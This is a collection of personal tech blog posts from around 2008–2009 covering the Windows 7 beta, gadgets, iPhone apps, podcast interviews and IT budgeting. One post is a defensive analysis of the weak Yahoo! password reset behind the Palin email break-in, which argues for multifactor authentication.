The CES Keynote is over, so now you can listen to our exclusive Windows 7 interview with Microsoft Sr. Community Manager for Windows Client IT Pros, Stephen Rose, available at these links:

RunAs Radio Web Site | Download MP3 file | Download WMA file

Alongside a core message of stepping up expectations in technology despite the economy, Microsoft announced this evening that it's releasing its Windows 7 Beta (build 7000) to the public for open testing and feedback. Last week Richard Campbell and I interviewed Microsoft's Stephen Rose for today's episode of RunAs Radio to discuss today's beta release, which was officially announced by Steve Ballmer during his keynote at CES tonight.

The general public gets it to download it this weekend, while MSDN and TechNet customers can get it now (product keys through the standard methods). Our interview with Stephen Rose contains some details about the how's and when's of getting the beta software for different people, as well as what one can expect from Windows 7.

It's good to see Microsoft adopting an open-beta model, where anyone who wants to can participate in the feedback process. It's going to be quite the undertaking to manage so many downloads and users, but I imagine it will be very much worth it in the end.

Of course, running a beta OS (which I tend to do regularly) isn't for the timid nor faint of heart. But for those who are comfortable, I think you'll be pleasantly surprised with the new version and what it has to offer when you check it out. Note that both 32- and 64-bit editions are available and the beta expires/times-out in the fall of this year.

Links for more information about and access to the Windows 7 Beta:

• Windows 7 page on Microsoft.com
• Windows Team Blog: Downloading Windows 7 Beta
  
• Springboard page on Microsoft TechNet

Unfortunately, I'm not one of the customers that AT&T has apparently been reaching out to in their testing of in-home micro wireless stations. I wish I was, since I live in the sticks and barely get service at all on my AT&T wireless phone. This is exactly what I need: A broadband-connected device that gives you local 3G coverage in your home.

Ars Technica reports that AT&T has described the device this way:

"AT&T's new product is a small, security-enabled cellular base station that easily connects to your home DSL or Cable Internet, providing a reliable wireless signal for any 3G phone in every room of your house. The device allows you to have unlimited, nationwide Anytime Minutes for incoming or outgoing calls."

If anyone from AT&T happens to be reading, I'd be ecstatic to try the device out and provide detailed feedback. Feel free to contact me, my email and phone number are over in the sidebar. I'm just sayin' ...

SD cards have become a de facto standard format for media in most devices, with a couple holdouts (namely Sony, which predictably uses a proprietary format). As such, the format has grown and there's been quite a bit of innovation effort focused in the SD arena.

A couple of announcements made this week at the CES show in Las Vegas are worth paying attention to. In one announcement, we learn that the SD format will support massively larger storage. In the other announcement, a popular WiFi-enabled SD card gains some nifty new video-handling features.

SDXC means on-card storage increase to a theoretical 2 terabytes

The SD Association announced a new standard (links to PDF file) that will soon have us leveraging massively larger storage capabilities (with much higher purchase prices, one would have to assume - we will have to see what the economies of scale bring us):

"The new SDXC specification provides up to 2 terabytes storage capacity and accelerates SD interface read/write speeds to 104 megabytes per second this year, with a road map to 300 megabytes per second."

That's some serious storage and speed. Photographers and HD videographers can soon rejoice. Just don't lose your little 2-terabyte card. Of course, it's likely that new devices will be needed to support the new standard. The SD Association says the SDHC, Embedded SD and SDIO specifications will also benefit from the new SD interface speeds. I'd be very (and pleasantly) surprised if we can take advantage of the larger storage capabilities in existing devices.

New Eye-Fi SD cards will allow direct HD uploads to YouTube

Eye-Fi already has a great thing going with their SD cards that use WiFi to transfer digital images, and now they're previewing a new card technology that will allow you to directly transfer your HD video content straight from the card to YouTube via WiFi. Now that's cool. I really want one of those for use in my Kodak Zi6 HD camera, and I'd use it in my full-sized HD camera, too. The power-requirement questions rattling around in my head will have to be answered at a later date, and I hope it will handle video as well as still images on the same card. Unfortunately they're not available yet, and no date was set for release. But I, for one, will definitely be watching for this.

Ever wonder how they put that amazing magical yellow line on the line of scrimmage and at the first-down point on the college and NFL football games we watch on TV? It's a terrific technology and has in many ways made watching football very different since it was adopted several years ago.

Well, for those of use who have wondered exactly how they do it, here's a video via FANDOME that explains in some technical detail how the magic TV line on the football field works:

Very cool stuff.

This is pretty cool. Not completely new, but interesting for the future.

LG will (eventually) be shipping a wrist-wearable cell phone that they just showed at the CES show in Las Vegas. I'm just pointing it out because this might just be the first watch I'd be willing to actually wear. Maybe. I'll probably hold out for a little thinner and smaller. Regardless, it's pretty cool.

There's an Engadget video of it at: http://www.viddler.com/explore/engadget/videos/116/

Would you want to wear a phone on your wrist? Useful or just geeky? I can hear the wrist-cancer complaints coming already...

(via Engadget)

Update - More links:

IntoMobile coverage - with lots of pics

I've written here several times in the past about Pandora, the slick Internet music app that streams music it determines you'll like based on a starting point you give it (like a specific artist, for example). You can refine the channel by voting up or down, song by song. Based on your votes and the "genetic" makeup of the music you rate, it determines what other music to put into the channel. The greatest aspect of using Pandora is discovering some truly great music and artists, many of which I never heard of before Pandora. It changed my music world.

Not too long ago, Pandora for the iPhone was released, and it was the number-one free iPhone app for 2008, and for good reason. It works well on WiFi or 3G networks and provides the majority of the functionality you get on the full-blown web app.

Well, today Pandora released v2 of their iPhone app, and they've added even more to it. Gleaned from the release notes, here are the new features:

• Tap the album art to see a progress bar, create a station from the current song or artist, or to email the station to a friend
• View the "back side" of the album art to read artist bios
• Rotates to a landscape layout to see recently played songs (coverflow-style)
• Play samples of each of your bookmarked songs
• Create a station based on genre

It's a cool update. I just wish I could close it and have it play in the background while I do other thing son my iPhone. I mean, come on Apple - It's the number-one app, make an exception, please! Anyhow, I don't know if I will use it more (it was already pretty great), but it adds some smart new functionality that's appreciated. You can find it here (links to iTunes App Store) or just get it for free via the App Store icon on your iPhone or iPod Touch.

A few photos to show you what I'm talking about:

Artist bio

'Create New Station' options

Sending to a friend without leaving the app

Coverflow-like view of past-played songs

Mark Minasi is a true character, and always a fun guy to have a conversation with. While in Las Vegas at the Connections conference Richard Campbell and I had a couple fun discussions with Mark, including one on the concept of Cloud Computing, and in the context of Microsoft's recent Azure announcement.

Mark's take on the whole cloud-computing thing is an interesting one. You can listen to our conversation with him via the RunAs Radio show link (Site|MP3).

While you're at it, you might also be interested in our other interview discussion with Mark that we did in Vegas, in which we covered (sort of, and among many other random things) Windows 7 (Site|MP3). It's a little crazy and chaotic, but was also a lot of fun.

Enjoy.

I'm stuck at home during this incredible and unusual snow storm. I quite literally cannot drive my four-wheel-drive truck out of my driveway due to the wet and icy layer under the two feet of snow that's accumulated, melted slightly, and then refrozen over the past week. Unfortunately, when the storm is at its worse, my iPhone has lost it's connection to AT&T's network. "No service" has become its full-time status. I've tried both enabling 3G (which we don't have out here) and restricting it to EDGE only, and it simply will not connect. Until recently I would at least get a signal if I set it down it in the right spot.

When the power goes out at the house, I need to be able to make at least one phone call (to the power department). In a storm out here, power outages are a fact of life. I've been unable to call the PUD this week because I had no cell service on the iPhone. And the power went out for 7 hours the other day.

Today I got fed up with the inability to place a call and waded through the sea of snow to my truck (which is stuck), rifled through my center console, and found my old Blackberry 8800 and the battery. It's been in there and unused for over a year. I popped the SIM card out of the iPhone and slid it into the Blackberry, then popped the battery in. Even after sitting for a year the battery had a half-full charge (wow) and the Blackberry powered up and within a few second acquired the AT&T network. Text messages started to flow in - success! Of course, the data connection was refused, but the GSM phone service works fine for text and voice service. It makes Snowmageddon a little more tolerable.

I've grown more and more frustrated with my iPhone's network performance over the past month. I plan to take it in and see if it's the individual phone, or a network change, or if it's more of a design thing, but I'm not holding my breath. Luckily the iPhone still works on WiFi without the SIM card (which actually makes it an "i" rather than an "iPhone" I suppose, heh), and that's good because I rely on it for a number of truly invaluable network-capable applications.

Anyone else done comparisons, or had network performance issues with their iPhone 3G after some time has passed? I've done complete restores of the phone to make sure the phone was clean software-wise, same issues. Any experience you have will be appreciated.

There are a few different options out there for running virtual machines on your desktop. One of those available options is Parallels, and an electronic-delivery special offer lets you get two copies of Parallels v4.0 for the price of one. That's $40 per copy, quite a deal. So, if you have a need to run Windows apps on your Mac, or you want to run any other PC-based operating system, you might consider grabbing a copy. You could give the other one away as a good, geeky Christmas gift.

Link: Parallels two-for-one offer

15 years ago Rwanda was the scene of massive genocide. Today the country is working to transform itself become an Internet hub of the African continent.

This is a good video by Internet Evolution, and shows that the Internet's not just about big companies and catch-phrase ideas like Web 2.0. You can't really see or know the extent of the Internet and it's impact without going places to see the impact for yourself. Since most of us can't do that on our own, Internet Evolution's Web Wide World videos take us there.

Not that you'd actually want to do it (or at least I don't think I would), but you have to admit it's pretty cool that you can now run Linux on the iPhone. It's really basic so far, but no doubt it will get better and have more and more hardware/feature support. Maybe a dual-boot option would be cool though, after all...

Details are here and Engadget has info, too. Video showing it off below. What would you use it for?

Portland's Shizzow, a thankfully-simple service that you can use to "shout" to your people and let them know where you are, has announced they're expanding into the California market. The service got its start here in Portland, Oregon and the team has methodically built it out and run it in the home market up until now.

The basic idea of Shizzow is this: A quick and easy social networking service that lets you quickly and easily communicate to your friends about where you are so you can spend more time face-to-face. It's really as simple as that. You don't need to know addresses, you can just provide a name. Shizzow figures out the rest. You can also add custom locations (like Greg's place, for example). There's a simple interfaces for web, mobile and SMS.

Now Shizzow has sprouted wings and is offering the service to people in California, with a focus on the San Francisco Bay Area - That's quite an expansion! The service is available for people living in either area via an invitation, which you can request here. I also have ten invitations available for anyone who asks, until they're gone. Just email me or leave a comment (be sure to provide your email address in the comment form so I can send it to you).

Great job by the Shizzow crew, which (it should be noted) is a small group of people that have built and run this operation outside of the their day jobs. That's how they plan to expand - Bootstrap it along and continue along the lines of their current success. I hope we'll see an API sometime soon, since that would provide the ability to deliver mobile apps and what have you, and could open up the use (and in the end enhance usability) of the system substantially. Cool stuff!

While at the TechEd EMEA conference is Spain this week, I had the opportunity to visit with Thomas Dawkins from Microsoft's Trustworthy Computing Group. He's the guy responsible for the Microsoft Security Assessment Tool (or MSAT for short). The MSAT is a tool that's been around for a couple of years, but it was recently updated by Thomas with some great new enhancements, including a new user interface and a stronger, more complete set of back end information.

MSAT is a free tool that you can download from Microsoft. It's targeted to companies of 1,500 employees or smaller (as a general rule) and follows a questionnaire format to assess weaknesses in the IT security environment. Bt it's not a parching tool or a scanning tool. Instead, it leverages standards like ISO 27001 and NIST-800.x to baseline the security readiness of your organization.

It enables people to do what we security professionals hope for: analysis across each of the people, process and technology elements of a business' computing environment in order to ascertain how and where we need to spend our time and energy. The tool not only describes the state of readiness of the assessed environment, it also provides best-practice recommendations rooted in industry-accepted standards that can be used to improve the organization's security stance.

One of the most likely users of a tool like this is the IT manager, but one can also picture security consultants, business managers, and anyone else with responsibility for an organization's security operations leveraging the tool and the reports it generates.

You'll also likely be interested to know that Microsoft has released the fifth version of its Security Intelligence Report, which looks at the state of computer and information security over the past six months. You can find links to the full report and the key findings summary documents on Microsoft's web site.

It's been an interesting and exciting few days in iPhone land.

In the just past couple days, Google Earth and a voice recording application from Griffin have both been released for the iPhone. Add to that the news that iPhone owners now have access to AT&T WiFi hotspots for free - nice! Google Earth is - of course - free, and Griffin iTalk is free for a limited time, along with it's Mac client (for syncing).

Google earth on the iPhone (iTunes app store link) is pretty cool. It takes advantage of the GPS and accelerometer, and other than that it's, well... Google Earth, just on a smaller screen. You can use touch/twist to rotate gestures on the screen, as you'd expect. I should mention that it's crashed a lot on me, and that when I first installed it I had to hard-reset my phone to get anything to work. But for the most part its been as stable as any other complex app on the device (meaning mediocre to so-so). It's worth the install for sure, if for no other reason then just because of most of the cool things you can do with Google Earth on your Mac or PC.

The other great app that everyone with an iPhone or second-gen iPod Touch should run and get right now (while it's free) is Griffin's iTalk and the complementary iTalk Sync client, which allows you to sync your audio recordings made with the iPhone app to your Mac (PC version coming soon) over the air via WiFi. It works like a charm, is well-documented, looks great and the audio quality is user configurable. The best quality setting sounds pretty great. It could realistically be used for man-on-the-street style interviews.

Provide a file name, select the recording quality, and start recording by clicking the Big Red Button:

The green button means you're actively recording. The VU meter shows your audio levels live. Click the green button to stop recording.

You'll end up with a file (or more than one if you record multiple times) showing in the recording list.

When you load up the Mac sync client app (a small and quick install) and start the iPhone app on the same wireless network, you'll be prompted to allows the sync client to access your iPhone's recordings.

While copying the file via the sync program, the iPhone shows you the status and progress:

And finally you have the files on your Mac (or soon on a PC), in .AIFF format, ready to use. Nice and easy!

I plan to play with the app in Barcelona next week and test the audio quality to see if it's really good enough for on-the-spot interviews for the podcast. It's worth a shot, although it won't touch the quality of my Zoom H4 recorder, of course.

Update: Microsoft's Mac business unit just set the land-speed record for turning around a fix. The story is available over at TUAW.

I've been wrestling with a problem for a few days after applying the latest Office 2008 for Mac update (v12.1.3). Everything works well except for sending and responding to meeting notices.

After the update, when Entourage tries to send a meeting notice or response, it throws the following: "[Error] Unexpected data was encountered. [Explanation] Mail could not be sent. Account name: 'Exchange - Greg' Error: -17997."

Needless to say, this is a frustrating problem. I managed to send some original meeting notices by opening them up after they failed to send (you can find them in the Outbox) and clicking the 'Send' button a second time. That worked for some reason. However, the same workaround doesn't seem to work for meeting responses, so I am having to send emails created by hand in order to confirm meeting requests with people who send them to me. Thankfully, when I accept a meeting request it does make it onto my calendar properly - it's just the outbound email that gets hung up.

I've had problems in the past with Entourage not parsing updates created by Outlook, but this is a much bigger and more painful problem. This is another case of "if it just worked the way it's supposed to, it would be the best option by far." A lot like my iPhone in that regard. Glitches kill the experience and create big frustration.

UPDATE: I just found a Microsoft newsgroup thread discussing the problem, and apparently it's a known issue bug in the latest release. Hopefully they'll be able to release a fix quickly. Workarounds include:

• Uninstall Office and reinstall, then update to the version prior to the latest release
  
• Move invitations you create from the Outbox to the Drafts folder and resend (won't work for acceptance notifications, though)
  
• Grin and bear it. :)

I may try removing my Entourage account profile from this computer completely and then setting it back up with the Exchange server fresh just to see what happens. I'd lose a few things that are store local-only in the process, but that won't really hurt me should I decide to go that route.

Anyone else having this issue? Any other great workaround ideas?

The fall conference season is upon us, and I'll be off to Barcelona on the first of November for a week at the Microsoft TechEd Europe/Middle East/Asia conference. I'll be joining my friend and colleague, Richard Campbell, there for the week. If by chance you'll also be there, be sure to let me know ahead of time!

Then, the following week Richard and I will both be traveling to Las Vegas for the Connections conference, where we'll be doing a live RunAs Radio recording session. Should be fun, and we have a great guest slated. More on that later.

If you'll be at either conference, please let me know via a comment or an email!

My friend Richard Campbell and I spent the morning recording a couple episodes of RunAs Radio for publication in the near future. One of our guests (whom we shall reveal when the show is published) provided some amazingly great information about using Performance Monitor, or "perfmon" for short. He's a perfmon Ninja, really. I'm excited about that show because I think when it comes up I think people will be able to learn something quite useful, as it includes some desktop video (perfmon is, after all, a very visual tool) and other resources. I think you'll like it.

Needless to say, both of us have been playing with perfmon for the past hour. Richard just IM'ed me with a funny situation, though:

Not really sure how that works. :)

So, be sure to check out RunAs Radio for the Performance Monitor show, which will be published sometime in the next couple weeks. We've also had a number of other great guests sit down with us over the past while, talking about some very useful topics suited for IT professionals. So check it out!

Dumping the warm-fuzzy naming convention and avoiding the year-based names of the past, Microsoft announced today that the next version of Windows, which will replace Vista, will be called simply "Windows 7."

Good idea.

It's the seventh version of Windows. It makes sense. Returning to a solid, basic, fundamental naming convention helps, I think, in helping to focus purpose on ensuring the fundamental requirements are met, that a solid, simple (from a usability standpoint at least) product is released. Etherial names like "Vista" sound cool, but subconsciously they also evoke an image and set an expectation of something magical, something not quite real.

That's not what's needed, especially this next time around. So keeping the name simple is the first sign of staying focused on the core product. I like that.

As Mike Nash explains, this is the first time a code name for an early product in development has been retained for the final product. Well, given the substantial departure from the conventional Microsoft code names, I'd say it's okay this time. :)

More information is available on the Windows Vista team blog, where the announcement was made.

Analyst and research company Gartner revised its IT industry projection figures and - as reported this morning by ZDNet and released by Gartner themselves - presented them during a symposium keynote at the company's big annual IT conference, which opened this morning. In a nutshell, Gartner analyst Peter Sondergard says they still expect growth, and that even in the very worst case, IT spending next year will fall about 2.5 percent. From ZDNET:

• Gartner had expected budgets to grow 3.3 percent in 2009.
• Now the most likely case is IT budget growth of 2.3 percent to 0 percent.
• The worst case is that IT budgets will be down 2.5 percent.

Forrester Research also recently cut it's projections for 2009 IT spending, but still ended up with figures in positive growth territory. So, if the analysts are to be believed, the business sector feeding products and services to IT should still see some growth.

The question is, where will that growth happen? My guess would be that one good place to be doing business is anywhere products or services are commoditized and can be outsourced, as well as in key technology areas like security and high availability.

Having successfully managed an IT organization at a "dot-com" company through a few years of painful economic times early in this decade, I can say from experience that at the time we had to cut overall IT spending dramatically to allow the company to survive. We went quickly from buying lots of new computers and software and building out data centers to buying practically nothing new for two full years. We renegotiated stacks of contracts with vendors and major software suppliers, consolidated services, convinced vendors to charge us less, and in the end prioritized every single project and said "no" a lot.

As a result, we cut our multi-million dollar budget almost in half and - in combination with other business changes - put ourselves in a position where we were just able to weather the storm financially. It was painful and a bit scary at times, and we had to deal with the side effects of substantial change. We had to get very creative in leveraging what we already had and nothing more, but in the end we all learned a difficult yet necessary lesson: You don't have to spend, spend spend to survive, or even to thrive in some cases.

In fact, what we needed to do was just the opposite of the "spend" approach. We would still spend where it made the most sense - but our decision-making process changed dramatically. You have to shift where the money goes to maximize your dollar's impact in the specific environment, adapt to the rapid changes in the marketplace, and work with your business partners and vendors to make it through to the other side. Smart vendors and good partners know that doing whatever it takes to survive a storm together means a better relationship when we all come out of the clouds.

Gartner has a list of ten things they say IT organizations need to consider when faced with tough economic times. They are not easy or happy things. But I think they're spot-on. I've had to do all of these things when times were toughest.

• Reduce headcount or freeze hiring
• Renegotiate with technology and service providers
• Curtail data center expansion, virtualize assets and lease them back
• Consolidate systems
• Outsource commodity
• Offshore outsource
• Investment shutdown
• Prioritize projects
• Mothball businesses and projects
• Change leadership and restructure IT teams

What's your IT plan? Are your budgets shrinking, or staying about the same? How would you prepare for tight times ahead?

The Chumby is a cool little Internet-enabled device that sits pretty much wherever you want and does all sorts of cool things. You can check it out here. Today it became even better that before, in a way that I especially appreciate, so I jumped on eBay to see if any were available there (you can buy them online new, too).

So what's this new cool thing that makes it even better in my eyes? Pandora - the Internet "radio station" app that I already use on my computer as well as my iPhone, is now available for Chumby.

I'm looking forward to waking up to my Pandora stations, viewing the latest weather for flying, playing new podcasts when they become available, displaying some of my favorite pictures. I'm sure there are a ton of cool things I'll be able to use it for that I can't possibly think of yet. I'll have to take a look at the Chumby Widgets guide while I wait for it to arrive.

A bit about the Chumby:

Chumby was designed from the beginning to take all your favorite parts of the internet, whether they’re video clips, or internet radio stations, or anime cartoons, or sports scores or the weather, or anything else, and, using your existing wi-fi connection, simply deliver them to you at a glance. Automatically, one after the next. You just leave it on — don’t worry, your carbon footprint isn’t getting much deeper, chumby draws far less power than a light bulb. No need to go to your study and boot up your computer and launch a browser, no need to fish your smartphone out of your purse and launch the browser application (…and wait) to get your favorite bits of online goodness.

Do you have one? What do (or would) you use it for?

DirecTV had an unusual technical glitch sometime in the past 48 hours, and as a result customers with either standard or HD DVRs might experience issues with a "frozen remote" or similar behavior. DirecTV Has emailed customers to let them know (see below).

This is important because if your DVR is in the hung state they describe, you need to reset it, or your scheduled recordings will likely not be recorded.

I had the issue exactly as described the night before last on my HD-DVR, and did a red button reset (RBR) at that time in order to restore it to normal functionality, which is pretty much what the email from DirecTV says to do:

IMPORTANT NOTICE ABOUT YOUR HD DVR OR DVR RECEIVER

In our effort to improve and expand our service, we experienced a temporary technical glitch. If your HD DVR or DVR receiver is not responding to your remote control or front panel commands, you can resolve this issue by pressing the red "Reset" button located inside the small door on the front right corner of your receiver. Please allow about 15 minutes for your receiver to complete the resetting process. Once completed, your picture will return automatically. Unfortunately, any show you may have scheduled to record yesterday will not be available on your DVR.

We sincerely apologize for any inconvenience this may cause you. Our promise is to provide you with the best television experience, and to resolve any issues that might arise as quickly as possible. If you have any further concerns, please do not hesitate in contacting us at 1-800-347-3288.

I speak English natively. My friend that I want to chat with in IM speaks German. A chat-helper service called MTBOT (Microsoft Translation Robot) allows me to type in English, yet my friend sees and reads what I wrote translated into his native German language. Likewise, when he types in German, what I see is his messages machine-translated into English.

If you use Windows Live Messenger, you too can add mtbot@hotmail.com to your buddy list. When you want to chat with someone who speaks another language, add them to a "conversation" with your TBot. You and the other person are asked to specify your native language, and after that you just start typing.

There are a number of commands you can issue to control TBot's behavior. To see a list of commands, just type "TBOT ?" in the IM window. You'll then be presented with the list of available commands:

Cool stuff. Check out the Translator information posted over at the Live Search blog.

Currently-supported languages:

• English to/from:
• Arabic
• Chinese Simplified
• Chinese Traditional
• Dutch
• French
• German
• Italian
• Japanese
• Korean
• Portuguese
• Russian (Russian to English only)
• Spanish
• Chinese Simplified to/from Chinese Traditional

Call your Congressional rep now (202-225-3121) and ask them to support H.R. 7084, the Webcaster Settlement Act of 2008. Pandora and other similar services need your help.

I called last night and left a message for my Congressman in Oregon, David Wu. If it's your first time, calling just know it's easy: The operator will answer the phone, you ask for your congressman by name, and they transfer you to the correct office.

I left a message for Wu last night stating that I wanted him to support the resolution because it was of a timely nature and it ensured fair ad reasonable competition, and that industry lobbyist attempts to defeat it or stall it were anticompetitive in motivation.

If you use online streaming music services like Pandora or other similar ones, their very existence may depend on this resolution, so make your voice known now. It really does make a difference.

If you don't know who your Congressperson is, you can look them up quickly here. All you need is your ZIP code.

On Wednesday morning (September 24th, that is) at 9 a.m. Pacific time, Ed Bott will be joining Microsoft Technical Fellow Mark Russinovich and others for a live IT Springboard panel online discussing Windows Vista performance, a topic of interest to many and (based on my observations) understood by few.

You can ask questions live or email them to the panel ahead of time. The panel should be located here when it happens. The Springboard Virtual Roundtable Series is a great IT resource, worth keeping an eye on. Here's some detail:

Springboard Series Virtual Roundtable
Under the Hood: Windows Vista Performance…Need Answers?

Join Mark Russinovich and a panel of industry experts for a LIVE virtual roundtable to explore your top of mind performance issues, common misconfigurations, and tips on how to fix them. From boot times and applets to disk performance and battery life, find out how to optimize Windows Vista and what you can do to improve overall system performance.

Submit your performance questions live during the event or send them in advance to vrtable@microsoft.com.

Save the date!
Wednesday, September 24, 2008
9:00am Pacific Time

I wasn't going to write anything about the new Microsoft commercials, which I really like, despite the fact that I wrote about the two Seinfeld/Gates commercials.

But then I realized that the PC Guy in the commercials is Sean Siler. He's a real tech guy who actually works at Microsoft for a living - as opposed to being a professional actor. Here's his TechNet blog.

In fact, Sean epitomizes the "I'm a PC" message. We interviewed him not too long ago for RunAs Radio on the topic of IPv6 (he's the program manager for IPv6 at Microsoft). I thought you might be interested in hearing what Sean had to say at that time. He's wicked smart and a fun conversation.

It sounds like it's been an interesting evening for Sean, but he took the time to exchange a couple emails with me, which was cool of him. Congrats to Sean, and to Microsoft. Good start!

So, here you go - Our interview with Sean from a few months ago:

RunAs Radio #53: Sean Siler Sets Us Straight on IPv6! (download MP3)

And here are the three new commercials. Personally, I like 'em.

Oh and if you send an email to Sean's address as listed in the three videos, you'll get a reply. I'd post it here, but it'll be more fun if you do it yourself. :)

It's really the classic case study in information (in)security and the need for strong authentication. With all due respect to the good people at Yahoo!, this opportunity to review Internet security mechanisms is too good and too useful to pass up.

By now, we all know Republican vice-presidential candidate Sarah Palin's Yahoo! email account was broken into on Tuesday night (read the link to get the details). Apparently (and fairly obviously), access was gained via the forgotten password mechanism on the Yahoo! webmail interface, which allowed the malicious person to reset the profile's password with just a few pieces of information about the Alaska governor (birthdate, ZIP code and a piece of info related to where she met her spouse) that could be easily discovered by searching Google. That fact that so much of Palin's life history has been documented on the Web makes her that much more vulnerable to knowledge-based security mechanism hacks. It should also be noted that some security questions are better (or stronger) than others, so it's important that questions you choose for online protection are not ones that can be answered with information available on the Internet.

We security folk frequently talk about something called "multifactor authentication." By "multifactor" we mean an authentication process that requires two or more of the following:

• Something you know (passwords, user names, answers to questions)
• Something you have (token, device, phone, etc.)
• Something you are (physical fingerprint, voiceprint, or other biometric measure such as a verifiable, non-spoofable behavior (some call this "something you do"))

Most multifactor auth systems are pretty easy to recognize. You know them when you see them. Those key fobs or cards with the revolving digits that you have to provide at login are a common example. They're also fairly expensive and complicated. Some multifactor technologies are easier to use than others. There are a variety of behind-the scenes systems that track user behavior and other markers to determine if the person accessing an account is the legitimate user or a bad guy, for example. A well-designed and well-implemented system balances usability with security strength, and some systems yield higher results in that regard than others.

In this particular case, the bad guy was able to leverage only things he knew (found via a search engine) to change the password on the account and gain access to the Yahoo! Mail account. No other verification or mechanism was required. That's simply weak security in this day and age.

I walked through the account password reset system on my Yahoo! account, just so I could get a first-hand look at how it works and how simple it is to reset an account there. Honestly, it was a little too easy. Here are the details (you can click each image to see them full-size):

First of all, I selected the option on the login screen that says, "Forgot your ID or password?"

Next I was prompted either to supply an email address for reset, or to choose the option to reset without access to a registered email account (which to me was an immediate red flag). Obviously, I chose the latter.

This is where the security mechanism breaks down. I'm immediately asked to answer a "secret" security question. This process is called knowledge-based authentication. It's an additional layer of validation in a single-factor authentication scheme - I have to provide "something else I know." Even in my case it's information that could be fairly easily discovered (assuming I answered the question accurately). It should also be noted that in order to change my security question, I need to contact Yahoo! customer support (which I did).

Once I supply the correct answer to a single question, I'm immediately allowed to change my password. At this point it should be noted that if I was prompted to answer multiple questions in this validation workflow, using some randomization of questions and setting a time limit to answer each one, that would at least make it more difficult for someone to gain unauthorized access. Systems are available to do exactly that (I know, I used to manage a team that built one such authentication app).

I'm asked to verify my ZIP code and country (just for profile information), and that's it. Note that other analyses of this process seemed to say that providing the ZIP code and Country was required to reset, but that was not the case in my review. In fact, it appears the bad guy is just being handed that information after changing the password, for free. Take that info, stick it in your Google and smoke it: More search accuracy for the next phase in your attack. Not good.

I'm then notified that my account is now "up to date." I also got an email notifying me of the changes that were made to an account I had tied to the Yahoo! profile for communication purposes. At least I can rest assured that I'll get an email before the bad guy goes into my profile and removes that address from the account.

I think you're starting to get the picture. The authentication mechanism is only as strong as it's weakest part, and the fact that I have an option to reset without ever having to leave the browser window is a problem. Even changing the system to require that I receive an email (which is already the standard reset mechanism) would be better. As it stands today, that's an option, but not a requirement.

Many will argue that hey, it's just an email account, and that Yahoo! can't be expected to implement stronger security on their site as a requirement. I say that's flat out wrong (and what the account was or wasn't used for isn't particularly relevant to this analysis). Email is the number one mechanism used to move information - both innocuous and sensitive - among people. The fact that it's not the best mechanism for doing so ignores the fact that it's how people do things. There are a variety of options available to help ensure only authorized users can get access to email accounts. The fact they are not regularly implemented is a sad state of affairs.

There are many options to strengthen the identification and authentication processes. We can't discuss them all here, but a couple on my mind are described below.

Physical tokens - Making the jump from only having to remember a user name (which is usually the email address, so hardly a secret ) and a password to a scheme where one must carry a token and provide information from it in order to log in is quite a leap (carrying yet another piece of technology around doesn't exactly appeal to me), but it works. The costs associated with fulfilling, supporting and maintaining such a system are very real, and for Yahoo! may not be realistic. But there are systems available to those who know and choose to use them that can substially improve your authentication profile. Check out Omar Shahine's recent blog entry describing how he's securing his accounts in a few ways, including with an OpenID-integrated single-sign-on token system from Verisign.

But, even if you use an OpenID to sign in, what if your OpenID is a Yahoo! ID or other identity that you can reset with a single piece of discoverable knowledge? It still needs to be protected from unauthorized changes and access.

How to do that? There are several ways. I have a couple of favorites, but please feel free to share yours.

Require security changes to take place out of band - One option, probably quicker and less expensive to implement than physical tokens, is using something like an automated telephone call or text message to require the owner of the account to verify a change should be allowed. By registering one or more phone numbers when the account is created and requiring a unique secret be provided via that channel to authorize a change, one can sufficiently secure the account. Vidoop uses a system like this for resetting information on their OpenID accounts. It's simple and it works. It requires me to have the correct device (my phone), uses a different communication channel (the phone network, hence "out-of-band") to contact me and then verifies I am a legitimate user. It requires me to interact as part of any change.

But the technology options get even better: JanRain's myOpenID, for example, now has a feature called "CallVerfID" that equips your myOpenID for two-factor authentication via the phone. It's quick and easy to set up and instantly protects every login with a multifactor authentication mechanism. I found I was not able to use it with a couple phone services due to the way they answer the call (I should provide feedback about that, added to my to-do list), but when set up for my cell or home phone it works as advertised.

Expect more of this class of technology in the future. Think, for example, about voice biometrics: Is that really you that's answering your phone? That kind of technology would be very cool if it was reliable. It's a complicated but useful technology that's being refined even as we discuss this.

I would guess that "review of all Internet email accounts" has been added to every campaign manager's list of things to do deal with early in the vetting process (not to mention the Secret Service's list). Any of the technologies above would likely have prevented the malicious bad guy from accessing the Yahoo! email account.

In the security world, change only happens when enough people make enough noise, a regulator gives an order, or enough companies feel enough financial pain. This looks like one of those cases where noise is the better option. It's certainly better than regulatory mandates (which tend to create collateral damage), and waiting on big companies to suffer is not exactly a reliable plan.

So... Feeling okay? How safe is your account, really?

The third wave of official beta apps under the Windows Live name have been made available a bit early for download. Full information and download links are located over at liveside.net. The updated Windows Live apps are:

• Messenger v9
• Windows Live Movie Maker
• Mail with Calendar synchronization
• Writer
• Photo Gallery
• Family Safety
• Outlook Connector

There are also non-English versions listed on the site and a few individual reviews posted at liveside.net:

• Wave 3: Windows Live Movie Maker Beta
• Wave 3: Windows Live Mail - Calendar, Calendar, Calendar (and more)
• Wave 3: Windows Live Writer – A First Look
• Wave 3: Windows Live Messenger 9 Beta – What’s New- A Comparison With 8.5

The most noticeable change is a whole new UI scheme for the apps, but there are a number of other changes in there, as well. Messenger's look and feel is very different. I see Live Writer now has direct YouTube integration - nice move and probably one that took some serious discussion to make happen (understandably). Time to start digging in and seeing what else the new apps offer under the hood.

The latest version of SQL Server implements several object models through Powershell to let folks manage SQL Server without using the SQL management tools.

We've just published a new episode of the RunAs Radio podcast with Michiel Wories, in which we dive into SQL Server 2008's Powershell features. Michiel is certainly the one to know and share about these features: He joined Microsoft 7 1/2 years ago in the role of Senior Program Manager for Microsoft SQL Server and is currently working as a Principal Architect on defining the next generation SQL Server management platform infrastructure. Michiel's blog is at http://blogs.msdn.com/mwories/

RunAs Radio is a weekly Internet-audio talk show for IT Professionals presented in a high-quality podcast format. Since April 2007 RunAs Radio has brought experts in the field of IT to its 10,000+ listeners, to inform and entertain. Professionally produced interviews are about 30 minutes in length and pack a substantial amount of information for maximum benefit. For more information about RunAs Radio, visit http://www.runasradio.com. RunAs Radio is available on iTunes and the Zune Marketplace, as well as directly from the RunAs Radio web site.

